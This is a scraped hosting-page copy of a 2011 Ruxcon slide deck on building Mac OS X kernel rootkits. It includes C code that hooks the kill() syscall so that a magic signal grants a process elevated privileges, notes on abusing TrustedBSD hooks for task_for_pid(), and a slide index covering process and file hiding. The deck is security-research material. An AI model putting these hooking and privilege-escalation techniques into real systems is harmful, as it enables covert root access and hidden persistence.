Defiling Mac OS X - Ruxcon - Reverse Engineering Mac OS X - PUT ...

More documents

Recommendations

Info

TECHNIQUES SYSCALL HOOKS void hook_syscalls() { if (my_sysent) { DLOG("[-] hooking kill()\n"); orig_kill = (int (*)(struct proc *,register struct h_kill_args *,int *)) my_sysent[SYS_kill].sy_call; my_sysent[SYS_kill].sy_call = hook_kill; } } int hooked_kill(register struct proc *cp, register struct h_kill_args *uap, register_t *retval) { ! if(uap->signum == SIG_DERP) { ! ! promote_proc(uap->pid); ! } ! return orig_kill(cp,uap,retval); } Defiling Mac OS X - Ruxcon November, 2011
TECHNIQUES TRUSTEDBSD HOOKS TrustedBSD = Mandatory Access Control ‣ Aka “Seatbelt” or Sandbox.kext ‣ Register handlers to enforce policy ‣ Handlers get called on various syscalls (Mach & BSD) ‣ Allow or deny requested action ‣ Can use as a kernel entry point ‣ Register callback for task_for_pid() ‣ Called when task_for_pid() is called from userland ‣ Check some identifying factor & do something cool ‣ See http://reverse.put.as for this tekniq Defiling Mac OS X - Ruxcon November, 2011
Page 1 and 2: DEFILING MAC OS X: KERNEL ROOTKITS
Page 3 and 4: STUFF Things I will talk about ‣
Page 5 and 6: Defiling Mac OS X - Ruxcon November
Page 7 and 8: GETTING CODE INTO THE KERNEL Defili
Page 9 and 10: TECHNIQUES GETTING CODE INTO THE KE
Page 11 and 12: TECHNIQUES GETTING CODE INTO THE KE
Page 13 and 14: TECHNIQUES DODGY KERNEL SYMBOL RESO
Page 15 and 16: TECHNIQUES DODGY KERNEL SYMBOL RESO
Page 17 and 18: TECHNIQUES SYSCALL HOOKS Old faithf
Page 19: TECHNIQUES SYSCALL HOOKS static str
Page 23 and 24: TECHNIQUES TRUSTEDBSD HOOKS kern_re
Page 25 and 26: TECHNIQUES NETWORKING HOOKS Registe
Page 27 and 28: ROOTKITTERY Defiling Mac OS X - Rux
Page 29 and 30: TECHNIQUES PROCESS PRIVESC void pro
Page 31 and 32: TECHNIQUES HIDING PROCESSES Might l
Page 33 and 34: TECHNIQUES HIDING FILES Hiding file
Page 35 and 36: ONE MORE THING... *cue turtleneck*
Page 37 and 38: EFI THE EXPLOSIVE FARMVILLE INVARIA
Page 39 and 40: EFI THE EXPANSIVE FURNITURE INTERFE
Page 41 and 42: REFERENCES Mac OS X Kernel Programm

Defiling Mac OS X - Ruxcon - Reverse Engineering Mac OS X - PUT ...

You also want an ePaper? Increase the reach of your titles

Delete template?

Save as template?